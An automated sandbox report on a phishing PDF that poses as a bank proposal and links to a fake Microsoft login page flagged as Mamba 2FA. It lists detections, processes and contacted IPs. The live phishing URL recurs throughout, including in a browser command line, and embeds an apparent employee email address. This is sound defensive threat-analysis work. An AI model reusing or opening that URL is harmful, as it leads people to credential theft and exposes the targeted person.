Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Updated_Proposal_20241113_pdf_banca.pdf

Overview

General Information

Sample name:Updated_Proposal_20241113_pdf_banca.pdf
Analysis ID:1555690
MD5:53d9a51b1c57265887013aac78134bf6
SHA1:faa2f71fb8becfdb149838cfa6e2021052d70a94
SHA256:79e3ec607922b203c9b48ee2bcc59d7130c38a332ad15fc5cdfe8eec87886319
Infos:

Detection

HTMLPhisher, Mamba2FA
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found potential malicious PDF (bad image similarity)
Yara detected HtmlPhish10
Yara detected Mamba 2FA PaaS
AI detected landing page (webpage, office document or email)
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
IP address seen in connection with other malware
Invalid 'forgot password' link found
Invalid T&C link found

Classification

Process Tree

  • System is w10x64
  • Acrobat.exe (PID: 7332 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Updated_Proposal_20241113_pdf_banca.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 7504 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7708 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1384,i,12974326492354929419,14040274795783035196,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 2008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.it" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1920,i,5273971204665831357,13377854627728883333,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
1.0.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
    1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.1.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
        1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itSlashNext: Label: Credential Stealing type: Phishing & Social Engineering

          Phishing

          barindex
          Yara detected HtmlPhish10
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Yara detected Mamba 2FA PaaS
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Phishing site detected (based on image similarity)
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itMatcher: Found strong image similarity, brand: MICROSOFT
          Phishing site detected (based on logo match)
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itMatcher: Template: microsoft matched
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itHTTP Parser: Number of links: 0
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itHTTP Parser: Title: Authenticating ... does not match URL
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itHTTP Parser: Invalid link: Forgot password?
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itHTTP Parser: Invalid link: Terms of use
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itHTTP Parser: Invalid link: Privacy & cookies
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itHTTP Parser: Invalid link: Terms of use
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itHTTP Parser: Invalid link: Privacy & cookies
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itHTTP Parser: <input type="password" .../> found
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itHTTP Parser: No favicon
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itHTTP Parser: No favicon
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itHTTP Parser: No <meta name="author".. found
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itHTTP Parser: No <meta name="author".. found
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itHTTP Parser: No <meta name="copyright".. found
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itHTTP Parser: No <meta name="copyright".. found
          Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
          Source: Joe Sandbox ViewIP Address: 18.245.31.5 18.245.31.5
          Source: Joe Sandbox ViewIP Address: 1.1.1.1 1.1.1.1
          Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: 2D85F72862B55C4EADD9E66E06947F3D0.1.drString found in binary or memory: http://x1.i.lencr.org/
          Source: chromecache_190.10.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.
          Source: chromecache_190.10.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e3281710
          Source: chromecache_190.10.drString found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffc
          Source: chromecache_190.10.drString found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js
          Source: chromecache_193.10.drString found in binary or memory: https://cdn.socket.io/4.7.5/socket.io.min.js
          Source: chromecache_190.10.drString found in binary or memory: https://google.com
          Source: chromecache_190.10.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.pn
          Source: chromecache_190.10.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
          Source: Updated_Proposal_20241113_pdf_banca.pdfString found in binary or memory: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTk
          Source: chromecache_190.10.drString found in binary or memory: https://www.w3schools.com/w3css/4/w3.css

          System Summary

          barindex
          Found potential malicious PDF (bad image similarity)
          Source: Updated_Proposal_20241113_pdf_banca.pdfStatic PDF information: Image stream: 12
          Source: classification engineClassification label: mal84.phis.winPDF@38/73@0/11
          Source: Updated_Proposal_20241113_pdf_banca.pdfInitial sample: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.it
          Source: Updated_Proposal_20241113_pdf_banca.pdfInitial sample: https://www.shop4myhealth.ukyb.com/m/?c3y9bzm2nv8xx25vbszyyw5kpwf6qkxzv289jnvpzd1vu0vsmdewnziwmjrvtklrvuuwmje4mdcwmtewmjayndiwmjqwnzaxmtgwmjewn0123ndiana.panaccione@banca.mps.it
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-14 04-28-10-465.logJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Updated_Proposal_20241113_pdf_banca.pdf"
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1384,i,12974326492354929419,14040274795783035196,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.it"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1920,i,5273971204665831357,13377854627728883333,262144 /prefetch:8
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1384,i,12974326492354929419,14040274795783035196,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1920,i,5273971204665831357,13377854627728883333,262144 /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Updated_Proposal_20241113_pdf_banca.pdfInitial sample: PDF keyword /JS count = 0
          Source: Updated_Proposal_20241113_pdf_banca.pdfInitial sample: PDF keyword /JavaScript count = 0
          Source: Updated_Proposal_20241113_pdf_banca.pdfInitial sample: PDF keyword /EmbeddedFile count = 0

          Persistence and Installation Behavior

          barindex
          AI detected landing page (webpage, office document or email)
          Source: https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.itLLM: Page contains button: 'Review and Sign' Source: '1.0.pages.csv'
          Source: PDF documentLLM: Page contains button: 'Review and Sign' Source: 'PDF document'
          Source: PDF documentLLM: PDF document contains prominent button: 'review and sign'
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Spearphishing Link          		Windows Management Instrumentation1
          Browser Extensions          		1
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          System Information Discovery          		Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Process Injection          		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1555690 Sample: Updated_Proposal_20241113_p... Startdate: 14/11/2024 Architecture: WINDOWS Score: 84 27 Found potential malicious PDF (bad image similarity) 2->27 29 Antivirus detection for URL or domain 2->29 31 Yara detected Mamba 2FA PaaS 2->31 33 4 other signatures 2->33 7 chrome.exe 1 2->7         started        10 Acrobat.exe 18 76 2->10         started        process3 dnsIp4 19 239.255.255.250 unknown Reserved 7->19 12 chrome.exe 7->12         started        15 AcroCEF.exe 105 10->15         started        process5 dnsIp6 21 50.87.150.217 UNIFIEDLAYER-AS-1US United States 12->21 23 13.107.246.45 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 12->23 25 8 other IPs or domains 12->25 17 AcroCEF.exe 2 15->17         started        process7

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.it100%SlashNextCredential Stealing type: Phishing & Social Engineering
          https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTk0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.ittrue
          • SlashNext: Credential Stealing type: Phishing & Social Engineering
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.1.drfalse
            		high
            https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTkUpdated_Proposal_20241113_pdf_banca.pdffalse
            • Avira URL Cloud: safe
            		unknown
            https://cdn.socket.io/4.6.0/socket.io.min.jschromecache_190.10.drfalse
              		high
              https://google.comchromecache_190.10.drfalse
                		high
                https://cdn.socket.io/4.7.5/socket.io.min.jschromecache_193.10.drfalse
                  		high
                  https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffcchromecache_190.10.drfalse
                    		high
                    https://www.w3schools.com/w3css/4/w3.csschromecache_190.10.drfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      50.87.150.217
                      		unknownUnited States
                      		46606UNIFIEDLAYER-AS-1USfalse
                      13.107.246.45
                      		unknownUnited States
                      		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                      18.245.31.5
                      		unknownUnited States
                      		16509AMAZON-02USfalse
                      142.250.74.196
                      		unknownUnited States
                      		15169GOOGLEUSfalse
                      1.1.1.1
                      		unknownAustralia
                      		13335CLOUDFLARENETUSfalse
                      192.229.133.221
                      		unknownUnited States
                      		15133EDGECASTUSfalse
                      239.255.255.250
                      		unknownReserved
                      		unknownunknownfalse
                      188.114.97.3
                      		unknownEuropean Union
                      		13335CLOUDFLARENETUSfalse
                      188.114.96.3
                      		unknownEuropean Union
                      		13335CLOUDFLARENETUSfalse
                      152.199.21.175
                      		unknownUnited States
                      		15133EDGECASTUSfalse
                      13.35.58.91
                      		unknownUnited States
                      		16509AMAZON-02USfalse

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1555690
                      Start date and time:2024-11-14 10:27:14 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 40s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowspdfcookbook.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:13
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Updated_Proposal_20241113_pdf_banca.pdf
                      Detection:MAL
                      Classification:mal84.phis.winPDF@38/73@0/11
                      Cookbook Comments:
                      • Found application associated with file extension: .pdf
                      • Found PDF document
                      • Close Viewer

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 184.28.88.176, 52.202.204.11, 52.5.13.197, 23.22.254.206, 54.227.187.23, 104.124.11.64, 104.124.11.43, 162.159.61.3, 172.64.41.3, 23.192.223.236, 23.192.223.240, 192.168.2.4, 2.23.197.184, 95.101.148.135, 199.232.214.172, 192.229.221.95, 142.250.186.99, 142.250.185.174, 64.233.184.84, 34.104.35.123, 142.250.181.227, 142.250.185.170, 172.217.18.106, 172.217.16.202, 142.250.186.170, 142.250.185.234, 142.250.186.42, 142.250.184.202, 142.250.181.234, 142.250.185.138, 142.250.184.234, 142.250.186.106, 142.250.185.202, 216.58.206.42, 142.250.185.106, 172.217.18.10, 172.217.16.138, 216.58.212.170, 142.250.186.74, 142.250.186.138, 142.250.74.202, 142.250.185.74, 216.58.212.138, 216.58.206.74, 142.250.184.227, 216.58.212.142
